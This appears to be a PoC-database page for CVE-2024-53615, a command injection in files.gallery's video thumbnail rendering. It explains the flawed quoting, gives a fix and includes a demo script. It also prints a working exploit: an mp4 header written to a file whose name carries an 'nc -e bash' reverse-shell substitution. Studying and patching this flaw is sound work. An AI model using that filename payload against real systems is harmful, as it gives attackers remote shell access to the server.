Related vulnerability
Title:
N/A
(CVE-2024-53615)
Description: A command injection vulnerability in the video thumbnail rendering component of Karl Ward's files.gallery, versions v0.3.0 through 0.11.0, allows remote attackers to execute arbitrary code via a crafted video file.
Description
CVE-2024-53615
Introduction
# CVE-2024-53615
`files.gallery` contains an RCE vulnerability: a command injection in the video thumbnail (preview) generation. Prerequisites:
- `ffmpeg` in `PATH` (the application shells out to it to render video previews)
- `config.php`: `'allow_upload' => true` (the attacker must be able to place a file with a name of their choosing)
- `exec` must be enabled in the PHP config (i.e. not listed in `disable_functions`)
The vulnerability is in the following line, which generates video previews:
```php
$cmd = $ffmpeg_path . ' -ss 3 -t 1 -hide_banner -i "' . str_replace('"', '\"', $this->path) . '" -frames:v 1 -an -vf "thumbnail,scale=480:320:force_original_aspect_ratio=increase,crop=480:320" -r 1 -y -f mjpeg "' . $cache . '" 2>&1';
```
`$this->path` is built from the name of the uploaded file, so it is attacker controlled. The only escaping applied is `str_replace('"', '\"', ...)`, which stops the value from terminating the double-quoted string but does nothing about `$(...)` and backtick command substitution, both of which the shell still expands inside double quotes. We can therefore construct a malicious file whose name is a bash command substitution. Two conditions matter: the file must start with valid video magic bytes so the application treats it as a video (the base64 below decodes to the first 48 bytes of an mp4, the `ftyp` box followed by the start of the `moov` box), and the filename must end with `.mp4`:
```sh
$ echo "AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAQv7bW9vdgAAAGxtdmhk" | base64 -d > '$(nc 127.0.0.1 8443 -e bash).mp4'
```
Upload this file, then refresh the gallery page so that the application indexes the new file and renders its thumbnail. When the `ffmpeg` command is assembled and passed to the shell, `$(nc 127.0.0.1 8443 -e bash)` is expanded first, so a reverse shell connects to a listener on port 8443 (127.0.0.1 here because the PoC was run against a local instance, so the shell arrives on our own machine). Note that `nc -e` requires a netcat build that supports it, such as ncat or nc.traditional.
Note: the command is carried in the filename, so the payload is bound by filename rules: it cannot contain `/` (which rules out absolute paths such as `/bin/bash`) and is limited in length (255 bytes on common Linux filesystems), so reverse shell options are limited.
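To make the quoting problem concrete, the following is an added example (not code from files.gallery or from the PoC repository) that reproduces the quoting used on the vulnerable line in POSIX shell and compares it with the single-quoting that PHP's `escapeshellarg()` (or Python's `shlex.quote()`) applies. `ffmpeg` is replaced with `printf '%s\n'` so the argument the program would actually receive after `-i` is printed; the function names `vuln_quote`, `safe_quote` and `render_arg` and the filenames are constructed for this example.

```shell
#!/bin/sh
# Added example: reproduce the quoting used on the vulnerable line and compare it with
# proper single-quoting. ffmpeg is replaced by printf so the command runs anywhere and
# prints the argument the program would actually receive after -i.

# Mimics PHP's str_replace('"', '\"', $path) followed by wrapping in double quotes.
# Only the delimiter is escaped; $(...) and backticks are still live inside "...".
vuln_quote() {
    printf '"%s"' "$(printf '%s' "$1" | sed 's/"/\\"/g')"
}

# Single-quotes the value and rewrites each embedded ' as '\'' (the transformation
# PHP's escapeshellarg() and Python's shlex.quote() perform). Nothing expands in '...'.
safe_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Build the command string by concatenation, exactly as the application does, then hand
# the string to a shell the way PHP's exec() would. $1 = quoting function, $2 = filename.
render_arg() {
    cmd="printf '%s\n' $("$1" "$2")"
    sh -c "$cmd"
}

# Constructed filenames for the demonstration (no upload involved).
render_arg vuln_quote 'clip$(echo INJECTED).mp4'   # prints: clipINJECTED.mp4 (substitution ran)
render_arg safe_quote 'clip$(echo INJECTED).mp4'   # prints: clip$(echo INJECTED).mp4 (literal)
render_arg vuln_quote 'a"b.mp4'                    # prints: a"b.mp4 (the one case the escaping covers)
```

The vulnerable builder does handle an embedded `"` correctly, which shows why escaping only the delimiter is a trap: any `$(...)` or backtick sequence in the name is evaluated before ffmpeg ever runs. In the PHP code the direct fix is `escapeshellarg($this->path)` (and likewise for `$cache`); better still, avoid the shell entirely by passing an argument array to `proc_open()` (supported since PHP 7.4), so there is no quoting layer left to get wrong.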
File snapshot
[4.0K] /data/pocs/ad0103e8a0a069644be3a84634af226f17509757
├── [2.0K] exploit.py
└── [1.1K] README.md
0 directories, 2 files
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source has been removed or cannot be reached, email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.